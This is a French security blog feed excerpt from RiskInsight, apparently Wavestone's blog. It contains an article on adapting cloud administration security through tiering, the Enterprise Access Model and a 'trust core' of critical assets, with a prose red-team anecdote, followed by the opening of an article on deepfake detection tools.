<p>Pour illustrer les précédents propos, mettons de côté l’aspect <em>Digital Workplace</em> (suite O365) et prenons 3 comptes AWS issus d’une Landing Zone de Tartampion, supportant différents services d’infrastructure :</p>
<figure id="attachment_28882" aria-describedby="caption-attachment-28882" style="width: 1695px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="size-full wp-image-28882" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/2-Exemple-de-comptes-AWS-pour-une-entreprise.png" alt="Exemple de comptes AWS pour une entreprise" width="1695" height="345" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/2-Exemple-de-comptes-AWS-pour-une-entreprise.png 1695w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/2-Exemple-de-comptes-AWS-pour-une-entreprise-437x89.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/2-Exemple-de-comptes-AWS-pour-une-entreprise-71x14.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/2-Exemple-de-comptes-AWS-pour-une-entreprise-768x156.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/2-Exemple-de-comptes-AWS-pour-une-entreprise-1536x313.png 1536w" sizes="auto, (max-width: 1695px) 100vw, 1695px" /><figcaption id="caption-attachment-28882" class="wp-caption-text"><em>Exemple de comptes AWS pour une entreprise</em></figcaption></figure>
<p> </p>
<p>En se fiant au référentiel proposé par Microsoft, ces <strong>trois comptes AWS devraient appartenir au Management plane</strong> avec un niveau de sécurité T1. Cependant, en cas de compromission d’un des 3 comptes par un attaquant, les impacts seraient très différents.</p>
<p>Si la Landing Zone est correctement implémentée, la compromission d’un compte de Sandbox n’aurait que très peu d’impact, tandis que celle du Master Account entrainerait celle de tous les comptes et ressources sous-jacentes.</p>
<p>Un exemple de découpage plus adéquat serait le suivant :</p>
<figure id="attachment_28884" aria-describedby="caption-attachment-28884" style="width: 1679px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="size-full wp-image-28884" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/3-Tiering-Model-etendu-a-lEnterprise-Access-Model.png" alt="Tiering Model étendu à l’Enterprise Access Model" width="1679" height="674" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/3-Tiering-Model-etendu-a-lEnterprise-Access-Model.png 1679w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/3-Tiering-Model-etendu-a-lEnterprise-Access-Model-437x175.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/3-Tiering-Model-etendu-a-lEnterprise-Access-Model-71x29.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/3-Tiering-Model-etendu-a-lEnterprise-Access-Model-768x308.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/3-Tiering-Model-etendu-a-lEnterprise-Access-Model-1536x617.png 1536w" sizes="auto, (max-width: 1679px) 100vw, 1679px" /><figcaption id="caption-attachment-28884" class="wp-caption-text"><em>Tiering Model étendu à l’Enterprise Access Model</em></figcaption></figure>
<p> </p>
<p>L’Enterprise Access Model par Microsoft est un <strong>framework macroscopique</strong> permettant d’initier une base de découpage des services cloud, mais <strong>qui reste à adapter</strong> selon la criticité des SI concernés.</p>
<p>Comment le rendre pertinent ? Pour répondre, il faut comprendre les scénarios d’attaque exploitant les services cloud.</p>
<p> </p>
<h2>Le Cloud vu de l’attaquant</h2>
<h3>5 principes du cloud favorisant les attaques</h3>
<p>Premièrement, les <strong>infrastructures cloud sont par défaut exposées sur Internet</strong>, contrairement aux ressources sensibles d’un SI. Ainsi, un phishing réussi conduit très probablement à un accès sur le Cloud.</p>
<p>Deuxièmement, les entreprises ont aujourd’hui des <strong>organisations hybrides</strong> (on-premise et cloud) :</p>
<ul>
<li>Les <strong>infrastructures cloud sont reliées au reste du SI on-premise</strong> ;</li>
<li>Les <strong>postes de travail</strong> peuvent également être <strong>hybrides</strong> et gérés par un service cloud comme Intune. Les permissions pour utiliser ce service sont gérées dans Entra ID ;</li>
<li>Les identités sont souvent des <strong>comptes synchronisés</strong>, cela concerne également les comptes d’administration.</li>
</ul>
<p>Les organisations hybrides peuvent faciliter les latéralisations entre le cloud et l’on-premise.</p>
<p>Troisièmement, la <strong>gestion des identités est très complexe avec différentes portées</strong>. Par exemple, Entra ID permet de gérer les accès à Azure et M365 aussi bien pour des utilisateurs, que des applications que des comptes de service.</p>
<p>Pour compléter, les notions de cybersécurité liées au Cloud sont encore relativement nouvelles et méconnues pour certaines équipes « legacy », comme le SOC/CERT, le réseau&#8230; Les <strong>ressources cloud les plus sensibles ne sont pas systématiquement identifiées, protégées et surveillées</strong>.</p>
<p>Enfin, même si des mécanismes de détection natifs sont présents, ils ne sont <strong>pas toujours interconnectés avec les SIEM/SOAR</strong>, ce qui ralentit les capacités d’intervention. Une récente opération Purple Team menée sur des infrastructures Azure et AWS a confirmé que les <strong>outils de détection natifs ont une capacité de détection limitée</strong>. Il s’agit d’un <strong>constat retrouvable dans les Red Team puisqu’avec une démarche « OpSec », les outils de détection cloud sont rarement capables d’identifier une attaque en cours</strong>.</p>
<p> </p>
<h3>REX de nos tests d’intrusion &amp; Red Team</h3>
<p>Issus des opérations de Red Team menées récemment, ces chemins d’attaques spécifiques aux environnements cloud sont témoin des impacts et des facilités qu’il est possible d’avoir pour s’élever en privilège jusqu’à obtenir des accès très permissifs :</p>
<figure id="attachment_28886" aria-describedby="caption-attachment-28886" style="width: 1689px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="size-full wp-image-28886" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/4-Exemples-de-chemins-dattaques-Cloud-exploites-en-Red-Team.png" alt="Exemples de chemins d’attaques Cloud exploités en Red Team" width="1689" height="761" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/4-Exemples-de-chemins-dattaques-Cloud-exploites-en-Red-Team.png 1689w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/4-Exemples-de-chemins-dattaques-Cloud-exploites-en-Red-Team-424x191.png 424w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/4-Exemples-de-chemins-dattaques-Cloud-exploites-en-Red-Team-71x32.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/4-Exemples-de-chemins-dattaques-Cloud-exploites-en-Red-Team-768x346.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/4-Exemples-de-chemins-dattaques-Cloud-exploites-en-Red-Team-1536x692.png 1536w" sizes="auto, (max-width: 1689px) 100vw, 1689px" /><figcaption id="caption-attachment-28886" class="wp-caption-text"><em>Exemples de chemins d’attaques Cloud exploités en Red Team</em></figcaption></figure>
<p> </p>
<p>Le premier scénario, effectué sur AWS, est décrit ci-dessous, les deux autres ont été analysés dans une série d’articles Risk Insight disponible <span style="color: #333399;"><a style="color: #333399;" href="https://www.riskinsight-wavestone.com/2025/01/enterprise-access-model-1-2-comment-definir-un-control-plane-pour-securiser-ladministration-cloud-et-empecher-une-compromission-a-grande-echelle/">ici</a></span>.</p>
<p> </p>
<p><span style="text-decoration: underline;"><em><strong>Reconnaissance et Accès initial</strong></em></span></p>
<p>Des catégories d’employés sont généralement <strong>ciblées afin de compromettre une personne avec des droits intéressants dans le SI (Développeur, Support, OPS…)</strong>. Un moyen souvent utilisé est d’utiliser du <strong>phishing</strong>. Les mécanismes de <a href="https://www.riskinsight-wavestone.com/2025/07/phishing-evilginx-pousse-a-ses-limites/"><span style="color: #333399;">phishing actuel</span></a> sont capables de contourner l’usage de mots de passe complexe et la plupart des méthodes de MFA (Multi-Factor Authentication).</p>
<p> </p>
<p><em><span style="text-decoration: underline;"><strong>Escalade de privilèges et mouvements latéraux</strong></span></em></p>
<p>Dans le premier scénario, un développeur compromis possédait des accès à une ferme Citrix. Les <strong>environnements Citrix ne sont pas simples à durcir complètement </strong>et quelques vulnérabilités d’échappement ont permis à la Red Team d’avoir un accès au serveur sous-jacent.</p>
<p>Les informations récoltées sur la machine ont indiqué que le serveur pouvait être hébergé sur AWS. Cela s’est vérifié en essayant d’<strong>accéder aux métadonnées AWS du serveur </strong>: l’instance avait des droits sur le compte AWS du client. La machine virtuelle du Citrix possédait le rôle « <strong>AmazonEC2FullAccess </strong>» lui permettant des actions de gestion sur les EC2 du même compte AWS.</p>
<p>À l’aide de la CLI AWS, les autres EC2 ont été listées. Un contrôleur de domaine du client était présent dans ce compte AWS. C’est une pratique courante de vouloir regrouper dans un même compte, généralement appelé « Shared Services », les services qui ont pour vocation d’être utilisés par plusieurs projets. Il est néanmoins recommandé de <strong>vérifier que la criticité des services partagés soit homogène de sorte à pouvoir appliquer un durcissement adéquat</strong> sur le compte, ou les séparer en plusieurs environnements.</p>
<p> </p>
<p><em><span style="text-decoration: underline;"><strong>Actions sur les trophées</strong></span></em></p>
<p>À partir du rôle AWS du serveur Citrix, <strong>une sauvegarde instantanée du contrôleur de domaine a été faite puis téléchargée</strong>. Les sauvegardes d’un contrôleur de domaine contiennent tous les fichiers de la machine, y compris les fichiers les plus sensibles, comme la base <em>ntds.dit</em>, qui contient les informations et secrets de tous les utilisateurs du domaine. L’exfiltration de cette base se traduit en la compromission totale du domaine AD concerné.</p>
<p>Ce scénario illustre l&rsquo;un des chemins d’attaques qui ont été exploités lors des opérations de redteam, facilité par le manque de visibilité sur les impacts que peuvent avoir une ressource compromise hébergée sur le cloud.</p>
<p> </p>
<h3>Des impacts plus rapides et plus forts</h3>
<p>Les attaques déjà possibles sur un SI on-premise peuvent être reproduites et même <strong>accélérées grâce aux fonctionnalités du cloud</strong>. Par exemple, le chiffrement de buckets S3 (service de stockage de fichiers) à partir d’une clé KMS (de chiffrement) d’un autre compte AWS imite le chiffrement massif de données, ou l’utilisation de la fonctionnalité « lifecycle » permet une suppression de tous les objets en moins de 24 heures, peu importe la quantité de données.</p>
<p>De nouvelles attaques sont également apparues comme le « <strong>Hijack de souscription</strong> » qui permet de <strong>rattacher un abonnement d’une organisation Azure à une autre</strong> et ainsi de voler toutes les données qu’il contient et empêcher les actions de remédiation. Cette attaque est réalisable en quelques clics depuis l’interface web Azure.</p>
<p> </p>
<h2>Identification et protection du cœur de confiance cloud</h2>
<h3>Identification du Cœur de confiance</h3>
<p><strong>Le cœur de confiance</strong> adopte une approche centrée sur la priorisation des actifs, qui diffère du modèle de tiering ou de l’Enterprise Access Model de Microsoft. Contrairement à ces modèles qui proposent un découpage prédéfini, il n’existe pas de grille universelle : chaque organisation doit identifier elle-même quelles ressources méritent le plus haut niveau de protection. L’idée est d’établir un <strong>cercle restreint de ressources critiques</strong> (qu’elles soient cloud ou on-premise) puis de <strong>déployer des niveaux de protection dégressifs à mesure que l’on s’éloigne de ce cœur</strong><strong>.</strong></p>
<p>L’identification du cœur de confiance repose sur <strong>deux grands critères</strong> :</p>
<ul>
<li><strong>Criticité métier</strong>: ce sont les ressources qui concentrent la valeur et la continuité des activités de l’entreprise. Si elles venaient à être perdues ou compromises, les conséquences seraient immédiates pour le fonctionnement quotidien et financièrement. Un environnement SharePoint contenant la donnée intellectuelle / brevets en est un exemple courant ;</li>
<li><strong>Criticité SI</strong>: il s’agit des ressources qui assurent l’administration du système d’information et qui disposent d’un niveau d’accès élevé. Leur compromission aurait un impact majeur sur l’ensemble du SI et permettrait d’avoir l’impact métier précédemment énoncé. On retrouve ici les contrôleurs de domaine ou encore les services d’IAM Cloud comme Entra ID et AWS Identity Center.</li>
</ul>
<p><em><strong> </strong></em></p>
<p>Cette cartographie n’est jamais totalement tranchée. Pour certains éléments, la posture à adopter reste plus floue, deux exemples l’illustrent bien :</p>
<ul>
<li><strong>L’EDR</strong>: élément de sécurité évident d’un SI, systématiquement déployé tant sur les postes de travail que sur les serveurs cloud <strong>et</strong> on-premise, sa console d’administration est de plus en plus souvent exposée sur internet, et permet d’exécuter des commandes arbitraires sur les équipements qui en sont équipés.</li>
<li><strong>Les chaînes CICD</strong>: un savant, mais complexe agglomérat d’applications s’appelant entre elles, dont l’accès (le gestionnaire de code : GitLab, GitHub…) est offert à l’ensemble des collaborateurs et les droits sur le SI (manipulé par les runners de déploiement) sont bien souvent administrateur de l’ensemble des infrastructures cloud. Sur l’ensemble des <strong>Red Team effectués en 2024 &amp; 2025, 80% ont exploité des vulnérabilités associées</strong> à ses solutions pour progresser dans leur opération, voire obtenir des trophées de compromission par ce biais.</li>
</ul>
<p> </p>
<p>Afin d’identifier le « noyau dur » du cœur de confiance, qu’on appellera <strong>socle de sécurité</strong>, on peut reprendre les préceptes de l’ancien T0 : la compromission d’un de ses éléments entrainerait probablement celles des autres, et par cascade de la majeure partie du SI.</p>
<p>En supposant que vos applications appliquent un correct cloisonnement interutilisateur (l’intégralité de vos sites SharePoint n’est pas accessible par tous, n’est-ce pas ?), les références aux prochaines applications seront à comprendre comme des <strong>accès administrateurs</strong> / super-utilisateurs à ces dernières, et non simple utilisateur.</p>
<p>Voici l’une des représentations possibles pour un cœur de confiance hybride :</p>
<figure id="attachment_28888" aria-describedby="caption-attachment-28888" style="width: 1680px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="size-full wp-image-28888" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/5-Proteger-lessentiel-votre-coeur-de-confiance.png" alt="Protéger l’essentiel, votre cœur de confiance" width="1680" height="998" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/5-Proteger-lessentiel-votre-coeur-de-confiance.png 1680w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/5-Proteger-lessentiel-votre-coeur-de-confiance-322x191.png 322w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/5-Proteger-lessentiel-votre-coeur-de-confiance-66x39.png 66w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/5-Proteger-lessentiel-votre-coeur-de-confiance-120x70.png 120w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/5-Proteger-lessentiel-votre-coeur-de-confiance-768x456.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/5-Proteger-lessentiel-votre-coeur-de-confiance-1536x912.png 1536w" sizes="auto, (max-width: 1680px) 100vw, 1680px" /><figcaption id="caption-attachment-28888" class="wp-caption-text"><em>Protéger l’essentiel, votre cœur de confiance</em></figcaption></figure>
<p> </p>
<p>Dans cette représentation, il y a côté on-premise :</p>
<ul>
<li><strong>Le T0</strong> avec ses contrôleurs de domaine, l’ADCS, et potentiellement la PKI, le bastion, la console EDR…</li>
<li><strong>Le T1</strong> en intégrant en plus les applications métiers à fort impact.</li>
</ul>
<p>Et côté Cloud, on retrouve :</p>
<ul>
<li>Au cœur le <strong>Control Plane</strong> (AWS Orga &amp; Identity Center, Entra ID) ainsi que les modules de la Landing Zone supportant le <strong>T0</strong> (si une partie du T0 est hébergée dans le Cloud) ;</li>
<li>En s’éloignant, les diverses <strong>consoles d’administration</strong> des suites de bureautique, et de management des infrastructures ou des applications.</li>
</ul>
<p>En établissant ce diagramme, il est important de garder à l’esprit que :</p>
<ul>
<li><strong>L’IT sert au métier</strong> et quand bien même la zone centrale du cœur de confiance est principalement occupée par des briques techniques, il convient d’inscrire ses solutions critiques ;</li>
<li><strong>Les</strong> <strong>chaînes de dépendance</strong> / compromission ont beaucoup d’impact sur les <strong>choix d’architecture</strong>: positionner un AD sur AWS, ou déployer un EDR sur un AD peut soudainement créer de nombreux chemins de compromission et de rebond entre les 2 mondes.</li>
</ul>
<p>Enfin, la construction d’un cœur de confiance ne peut pas se limiter à une logique de classification statique. Elle doit reposer sur <strong>une approche qui évalue la criticité de chaque actif et le risque qu’il introduit</strong> (une entreprise de développement de logiciel ne positionnera surement son Git au même niveau qu’une entreprise de travaux public).</p>
<p> </p>
<h3>Protection du cœur de confiance cloud</h3>
<p>La sécurité du cœur de confiance va reposer sur les deux traditionnels facteurs de risques :</p>
<ul>
<li><strong>Réduire l’impact</strong>: comment empêcher un utilisateur compromis ou malveillant de se connecter aux portails cloud sur un navigateur et de faire des actions sensibles en quelques clics, comme faire une sauvegarde d’un contrôleur de domaine hébergé sur une VM ou supprimer les sauvegardes de données de production ?</li>
<li><strong>Réduire la probabilité </strong>: comment réduire les risques d’accès illégitimes à partir d’un cookie de session volé par phishing, de la compromission d’un poste de travail ou de la réutilisation de mots de passe des utilisateurs ?</li>
</ul>
<p> </p>
<p><strong><em><span style="text-decoration: underline;">Protection du socle de sécurité cloud</span></em></strong></p>
<p>Concernant le « socle de sécurité » cloud il est possible de hiérarchiser les environnements par criticité selon cette échelle macroscopique :</p>
<figure id="attachment_28890" aria-describedby="caption-attachment-28890" style="width: 1641px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="size-full wp-image-28890" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/6-Les-principaux-niveaux-du-socle-de-securite-cloud.png" alt="Les principaux niveaux du socle de sécurité cloud" width="1641" height="678" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/6-Les-principaux-niveaux-du-socle-de-securite-cloud.png 1641w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/6-Les-principaux-niveaux-du-socle-de-securite-cloud-437x181.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/6-Les-principaux-niveaux-du-socle-de-securite-cloud-71x29.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/6-Les-principaux-niveaux-du-socle-de-securite-cloud-768x317.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/6-Les-principaux-niveaux-du-socle-de-securite-cloud-1536x635.png 1536w" sizes="auto, (max-width: 1641px) 100vw, 1641px" /><figcaption id="caption-attachment-28890" class="wp-caption-text"><em>Les principaux niveaux du socle de sécurité cloud</em></figcaption></figure>
<p> </p>
<p>En fonction des équipes en charge et de la complexité de les inclure dans un niveau de protection particulièrement élevée, certaines organisations font le choix d’exclure des environnements dont la compromission ne permettrait pas une latéralisation dangereuse, telle que ceux de FinOps, de détection, le Digital Workplace…</p>
<p>La sécurisation du socle de sécurité cloud repose sur 2 principaux points :</p>
<ul>
<li>Une <strong>hygiène</strong> impeccable : configuration IAM épurée, respect du moindre privilège, procédure de déploiement, limitation des ressources au strict nécessaire…</li>
<li>Une couche de sécurité passive / active : déploiement de <strong>politiques</strong> (SCP sur AWS, Policy sur Azure) interdisant explicitement certaines actions, ou la manipulation de certaines ressources, et <strong>règles de détection</strong> afin de lever une alerte en cas de modification d’une politique ou l’occurrence d’un de ses évènements protégés ;</li>
</ul>
<p>Ces politiques peuvent efficacement être associées à une <strong>stratégie de tagging</strong> afin d’appliquer, en plus du modèle RBAC (Role Based Access Control) un modèle ABAC (Attribute Based Access Control).</p>
<p>Par exemple il est possible de tagger différentes ressources avec une clé « tiering » et une valeur entre « T0 », « T1 », « T2 » puis de déployer cet ensemble de stratégies :</p>
<ul>
<li>Interdire toute action visant une ressource taguée tiering par une identité dont la valeur de son propre tag tiering n’est pas équivalente ;</li>
<li>Interdire la manipulation de tag tiering, sauf pour un rôle bien précis.</li>
</ul>
<p>Et voilà comment, en quelques tags et 2 SCP, il est possible de répliquer le tiering model de Microsoft (quelques exceptions peuvent subvenir).</p>
<p> </p>
<p><strong><em><span style="text-decoration: underline;">Protections des identités et des accès</span></em></strong></p>
<p>Pour protéger les utilisateurs, 3 thématiques de durcissement peuvent être mises en place :</p>
<ul>
<li><strong>Identité </strong>: avec quel compte l’utilisateur se connecte-t-il aux interfaces d’administration cloud ? Comment les droits sont-ils obtenus ?</li>
<li><strong>MFA</strong> : l’identité est-elle protégée avec une authentification multifactorielle résistante aux attaques de phishing ?</li>
<li><strong>Provenance</strong>: à partir de quelle plateforme l’utilisateur se connecte-t-il aux interfaces d’administration cloud ? La plateforme est-elle managée, et saine ?</li>
</ul>
<p>Plusieurs niveaux de protection sont envisageables afin de protéger les administrateurs cloud :</p>
<figure id="attachment_28892" aria-describedby="caption-attachment-28892" style="width: 1684px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="size-full wp-image-28892" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/7-Aligner-le-niveau-de-protection-avec-le-niveau-de-risque.png" alt="Aligner le niveau de protection avec le niveau de risque" width="1684" height="835" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/7-Aligner-le-niveau-de-protection-avec-le-niveau-de-risque.png 1684w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/7-Aligner-le-niveau-de-protection-avec-le-niveau-de-risque-385x191.png 385w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/7-Aligner-le-niveau-de-protection-avec-le-niveau-de-risque-71x35.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/7-Aligner-le-niveau-de-protection-avec-le-niveau-de-risque-768x381.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2026/01/7-Aligner-le-niveau-de-protection-avec-le-niveau-de-risque-1536x762.png 1536w" sizes="auto, (max-width: 1684px) 100vw, 1684px" /><figcaption id="caption-attachment-28892" class="wp-caption-text"><em>Aligner le niveau de protection avec le niveau de risque</em></figcaption></figure>
<p> </p>
<p>Afin de protéger le <strong>cœur de confiance restreint</strong>, représenté par les triples cadenas, il est recommandé de mettre en œuvre les <strong>facteurs d’authentification les plus robustes</strong>. Cela inclut l’utilisation d’un compte dédié à l’administration cloud, l’activation d’une authentification multifactorielle physique (exemple : clé de sécurité FIDO2) et le recours à un poste de travail spécifiquement réservé aux opérations sur ce cœur de confiance.</p>
<p>Pour les <strong>ressources plus éloignées</strong> du centre du cœur de confiance, symbolisées par les doubles cadenas, un <strong>niveau de sécurité durci, mais proportionné</strong> peut être appliqué, afin de renforcer la protection pour maitriser les coûts et réduire les contraintes excessives aux utilisateurs concernés.</p>
<p>Finalement, les <strong>méthodes les plus sécurisées sont également celles qui impliquent le plus de contraintes aux personnes concernées</strong>. Il faut maitriser les usages et prendre en compte des situations d’urgence, comme une intervention en astreinte nécessitant des privilèges très élevés.</p>
<p> </p>
<h3>Répéter les opérations</h3>
<p>À l’issue des phases d’identification et de protection, les ressources seront réparties dans les différentes couches du cœur de confiance.</p>
<p>Pour vérifier la bonne implémentation du cœur de confiance, un <strong>audit peut être conduit pour vérifier la bonne protection des ressources</strong> critiques qui le compose.</p>
<p>Un système d’information est toujours en évolution, mais les deux premières phases auront été faites à un instant <em>t</em>. De <strong>nouvelles ressources critiques peuvent être ajoutées, d’autres modifiées, voire supprimées</strong>. Il est primordial de <strong>refaire une évaluation régulière de son SI </strong>et de mettre à jour la répartition des ressources dans le cœur de confiance.</p>
<h2> </h2>
<p>En conclusion, la sécurité des systèmes d’information s’inscrit désormais dans un contexte de complexité croissante et de forte diversification des composants et services d’infrastructures.</p>
<p>Dans ce contexte, il apparaît de plus en plus complexe de définir un modèle de sécurité universel. Certains cadres conservent toute leur pertinence sur des périmètres bien identifiés : le tiering reste une référence pour la sécurisation de l’Active Directory, tout comme l’EAM pour des environnements Cloud fortement centrés sur l’écosystème Microsoft. Néanmoins, ces modèles atteignent rapidement leurs limites dès lors que l’on s’éloigne de ces cas d’usage spécifiques.</p>
<p>Pour la majorité des systèmes d’information, une approche fondée sur l’analyse des risques s’impose donc comme la plus pertinente. Identifier un cœur de confiance, définir clairement les actifs critiques <em>— les crown jewels —</em> et décliner les mesures de sécurité à partir de ces éléments permet de construire une posture de sécurité plus pragmatique, adaptée à la réalité du SI et capable d’évoluer avec lui.</p>
<p>Cette logique, moins normative mais plus contextualisée, constitue sans doute l’un des leviers majeurs pour concilier sécurité, agilité et pérennité des systèmes d’information.</p>






<p>Cet article <a href="https://www.riskinsight-wavestone.com/2026/01/securite-orientee-cloud-adaptation-a-une-nouvelle-realite/">Sécurité orientée cloud : Adaptation à une nouvelle réalité</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2026/01/securite-orientee-cloud-adaptation-a-une-nouvelle-realite/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Radar de solutions anti-Deepfake :  étude de l’écosystème des solutions de détection de contenu généré par IA </title>
		<link>https://www.riskinsight-wavestone.com/2025/11/radar-de-solutions-anti-deepfake-etude-de-lecosysteme-des-solutions-de-detection-de-contenu-genere-par-ia/</link>
					<comments>https://www.riskinsight-wavestone.com/2025/11/radar-de-solutions-anti-deepfake-etude-de-lecosysteme-des-solutions-de-detection-de-contenu-genere-par-ia/#respond</comments>
		
		<dc:creator><![CDATA[Louis-marie Marcille]]></dc:creator>
		<pubDate>Wed, 26 Nov 2025 15:17:45 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[AI Générative]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Deepfake]]></category>
		<category><![CDATA[Gestion des risques]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=28196</guid>

					<description><![CDATA[<p>Un deepfake est un type de contenu synthétique apparu pour la première fois en 2017, reposant sur l’intelligence artificielle, pour créer ou falsifier du texte, des images, des vidéos et des audios de manière très réaliste. Les technologies associées étaient initialement utilisées à des fins de divertissement ou perçues comme des outils de démonstration technologique d’avenir. Mais aujourd’hui, leur détournement à des fins malveillantes éclipse cet usage primaire, les présentant...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/11/radar-de-solutions-anti-deepfake-etude-de-lecosysteme-des-solutions-de-detection-de-contenu-genere-par-ia/">Radar de solutions anti-Deepfake :  étude de l’écosystème des solutions de détection de contenu généré par IA </a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;"><span data-contrast="auto">Un deepfake est un type de contenu synthétique apparu pour la première fois en 2017, reposant sur l’intelligence artificielle, pour créer ou falsifier du texte, des images, des vidéos et des audios de manière très réaliste. Les technologies associées étaient initialement utilisées à des fins de divertissement ou perçues comme des outils de démonstration technologique d’avenir. Mais aujourd’hui, leur détournement à des fins malveillantes éclipse cet usage primaire, les présentant comme une menace émergente et un défi majeur pour la confiance numérique. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-contrast="auto">Ces utilisations malveillantes peuvent être réparties en 3 grandes catégories :</span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<ul style="text-align: justify;">
<li><b><span data-contrast="auto">Désinformation et phishing amélioré :</span></b><span data-contrast="auto"> des vidéos falsifiées portant un discours travaillé peuvent être exploitées pour manipuler l’opinion publique, influencer des débats politiques ou diffuser de fausses informations. Le discours de la vidéo poussera par exemple la cible à cliquer sur des liens de phishing. Nous avons déjà vu par le passé de telle usurpation d’identité ciblant des personnalités publiques ou des PDG d’entreprises pour inciter à de faux investissement par exemple. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><b><span data-contrast="auto">Fraude au président et ingénierie sociale :</span></b><span data-contrast="auto"> les attaques connues de « </span><i><span data-contrast="auto">scam »</span></i><span data-contrast="auto"> téléphonique ou de fraude au président deviennent plus difficile à détecter et éviter si un attaquant imite la voix d’un dirigeant pour valider un transfert bancaire ou usurper une identité complète (visage et voix) pour accéder à des informations sensibles. Ces usurpations d’identité en direct, notamment en visioconférence, ont déjà causé de grands dégâts financiers comme ce fut le cas à Hong Kong début 2024</span><span data-contrast="auto">1</span><span data-contrast="auto">. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></li>
<li><b><span data-contrast="auto">Usurpation d’identité pour contourner les solutions de KYC</span></b><b><span data-contrast="auto">2</span></b><b><span data-contrast="auto"> :</span></b><span data-contrast="auto"> de plus en plus d’applications, notamment dans le domaine bancaire, utilise des processus de vérification d’identité pour l’utilisateur en analysant le visage de celui-ci en direct. Une modification numérique de l’image du visage envoyée à l’application peut permettre à un acteur malveillant de se faire passer pour une autre personne lors de la vérification d’identité.</span></li>
</ul>
<p style="text-align: justify;"><span data-contrast="auto">Directement lié à l’évolution exponentielle de l’intelligence artificielle générative ces dernières années, le nombre de modèles disponibles pour générer des deepfakes ainsi que leur sophistication est en forte hausse. Il est de plus en plus courant que les entreprises subissent de telles attaques (comme l’atteste notre dernier rapport annuel CERT-W</span><span data-contrast="auto">4</span><span data-contrast="auto">) et il devient de plus en plus difficile de les détecter et contrer. </span><span data-ccp-props="{&quot;335551550&quot;:6,&quot;335551620&quot;:6}"> </span></p>
<p style="text-align: justify;"><span data-ccp-props="{&quot;134245418&quot;:true,&quot;335551550&quot;:2,&quot;335551620&quot;:2}" data-wp-editing="1"> <img loading="lazy" decoding="async" class="aligncenter wp-image-28201 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive1-e1764164832688.jpg" alt="Augmentation des technologies deepfakes et des pertes financières en résultant" width="640" height="275" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive1-e1764164832688.jpg 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive1-e1764164832688-437x188.jpg 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/11/Diapositive1-e1764164832688-71x31.jpg 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></span></p>
<p style="text-align: center;"><i><span data-contrast="none">Figure </span></i><i><span data-contrast="none">1</span></i><i><span data-contrast="none"> &#8211; Augmentation des technologies deepfakes et des pertes financières en résultant</span></i></p>
